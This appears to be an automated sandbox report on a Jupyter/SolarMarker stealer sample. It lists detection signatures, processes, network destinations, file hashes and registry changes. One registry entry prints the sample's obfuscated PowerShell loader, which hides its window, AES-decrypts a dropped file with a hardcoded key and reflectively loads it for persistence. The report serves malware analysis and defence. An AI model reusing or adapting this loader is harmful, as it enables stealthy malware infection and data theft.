Analysis Overview
SHA256
e864d8d2a93f38d2714ad1f0b5f79cef79d46022cd6b29c3ed8e52c8c79e7ff9
Threat Level: Known bad
The file ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.7z was found to be: Known bad.
Malicious Activity Summary
Jupyter, SolarMarker
suricata: ET MALWARE Jupyter Stealer CnC Checkin
Jupyter family
Blocklisted process makes network request
Drops startup file
Program crash
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2022-06-13 00:02
Signatures
Jupyter family
Analysis: behavioral1
Detonation Overview
Submitted
2022-06-13 00:01
Reported
2022-06-13 00:08
Platform
win10-20220414-en
Max time kernel
138s
Max time network
298s
Command Line
Signatures
Jupyter, SolarMarker
suricata: ET MALWARE Jupyter Stealer CnC Checkin
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QhGywHLreAszXutEwsWWihf.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell\open\command | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell\open | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell\open\command\ = "powershell -command \"$showWindowAsync=Add-Type -MemberDefinition ('['+'D'.ToUpper()+'ll'.ToLower()+'I'.ToUpper()+'mport('.ToLower()+[char]0x22+'user32.dll'.ToLower()+[char]0x22+')]public static extern bool '.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync('.ToLower()+'I'.ToUpper()+'nt'.ToLower()+'P'.ToUpper()+'tr hWnd, int nCmdShow);'.ToLower()) -Name ('W'.ToUpper()+'in32'.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync'.ToLower()) -Namespace Win32Functions -PassThru;$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0);$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('9Qw7HmyNbXwDhTl1BCWQ9HiCHVJ6biS29AI3joRqFsE=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\AppData\\Local\\Temp\\pVbWJYZDDCSHJ\\YmZzDuyJLaoZWFP.KQCAccTWwYOdCobshuYIIWjvAgPA'));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[WMjltFazGzRYICFIoq5XoJDM1T0sO959lZpC3tdMx9r6rF4.aOQnwFCqXLWVnkObggxLLxB9CQD8t3NAI8E_o_VOjfEb3SskE3Fab05w_MOsLyIbBovKJMjkKSlk9pTjBqWv]::RRye6ZIFpv7n8DDuAo9IugHH9lFCZ();\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\.kqcacctwwyodcobshuyiiwjvagpa | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\.kqcacctwwyodcobshuyiiwjvagpa\ = "znmroizkuvzkfkiogetiwusss" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe
"C:\Users\Admin\AppData\Local\Temp\ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m2slr0sk\m2slr0sk.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5E80.tmp" "c:\Users\Admin\AppData\Local\Temp\m2slr0sk\CSCA8B179817ABA4314ACF645DDFC6D16A1.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2932 -s 944
Network
| Country | Destination | Domain | Proto |
| RO | 37.120.247.120:80 | 37.120.247.120 | tcp |
| US | 8.238.20.126:80 | tcp |
Files
memory/2932-114-0x0000000000720000-0x0000000001720000-memory.dmp
memory/4040-115-0x0000000000000000-mapping.dmp
memory/4040-121-0x000002122E240000-0x000002122E262000-memory.dmp
memory/4040-142-0x000002122E3E0000-0x000002122E41C000-memory.dmp
memory/4040-153-0x000002122E8F0000-0x000002122E966000-memory.dmp
memory/4340-230-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\m2slr0sk\m2slr0sk.cmdline
| MD5 | 1eeb07bec0c50ea3fde3eb7ebbf2696c |
| SHA1 | 9ab2dc69969b2b3567978960338ed5fb4bbdba06 |
| SHA256 | 377c3d45039c7df67f3e1779059c0aceb6be66e4a97c745e956840d005fe16b4 |
| SHA512 | f0bcd40d1bfc147c367dd8660f95780c4cae5df7f85fb161270e70029d9e4e9f4c3fa4f826cd286ce366361f41d755f28781d10a3a3300166cd8bc286b10c626 |
\??\c:\Users\Admin\AppData\Local\Temp\m2slr0sk\m2slr0sk.0.cs
| MD5 | 2f9b4948ac0b26204994e246094a9f5d |
| SHA1 | 9870e53ad61eba593a2074d2a30202f7e3df09f7 |
| SHA256 | def6ec20884e30f8689cb1ccb8fb62735db528c5277f52f64ecae170cfd49776 |
| SHA512 | ef5f9056b36c8f9204a65b26244f225a9c2cc3bf5b1c46055e6eda06e63769243538b568b29627eb497289777fa69468e64b5eae0fb666bbb2e432a3059154d1 |
memory/3708-233-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\m2slr0sk\CSCA8B179817ABA4314ACF645DDFC6D16A1.TMP
| MD5 | 1c11d3ae5fd77a79312b6c30d0a66553 |
| SHA1 | 96bf5d3745727569a87594103400b107da643152 |
| SHA256 | 9956ebc42062cb7aa5317cb483dc43b4ae186ccb41cd7b57a7ef22b0abe9a7d9 |
| SHA512 | bc137488d97f6bfe6cbd5107c23d3b497e0b2618c5a78b8c4eb3f0946cb13dcbc516b869446710e8f25be5cad2d0c319302d7edf2d5f4b171ac12ef436ccb239 |
C:\Users\Admin\AppData\Local\Temp\RES5E80.tmp
| MD5 | 7323216a4b3cb72a8e4b9e18769a63d7 |
| SHA1 | e35e0b917b06e1bc586d031a5e27cdec42db5c17 |
| SHA256 | 1fd38a3bedb9b5e4337d8834eb2d1cfd87618959b92898accd49241b737bc900 |
| SHA512 | 54ae2c3fa700a400973cc3ad437bfa4c359dccddfcf9012921bc598dde0aa513f44047793018fc75e3159dbfb5a171a6a2f40a6a39dfbc44e69800a8eed2eaab |
C:\Users\Admin\AppData\Local\Temp\m2slr0sk\m2slr0sk.dll
| MD5 | e2fc3e1ad6b1857e10377afba34315a2 |
| SHA1 | b8b239cb809359e0d9893fe993cbf5fe3076cd91 |
| SHA256 | f8c6fb96d781568e280d1c524b63a1932d7abbec6fc8558f6b2959ba360758dd |
| SHA512 | 7adc76e3c25c01c4786433f9d76c4b4876165ca455192847077e673c90731d9b741d87962961b7c31f72dd2afdb7729b743143968b90f171d48cdedb8c2848a3 |
memory/4040-237-0x000002122E3B0000-0x000002122E3B8000-memory.dmp
memory/4368-329-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 2143b379fed61ab5450bab1a751798ce |
| SHA1 | 32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e |
| SHA256 | a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81 |
| SHA512 | 0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa |
memory/4040-383-0x000002122E970000-0x000002122EA34000-memory.dmp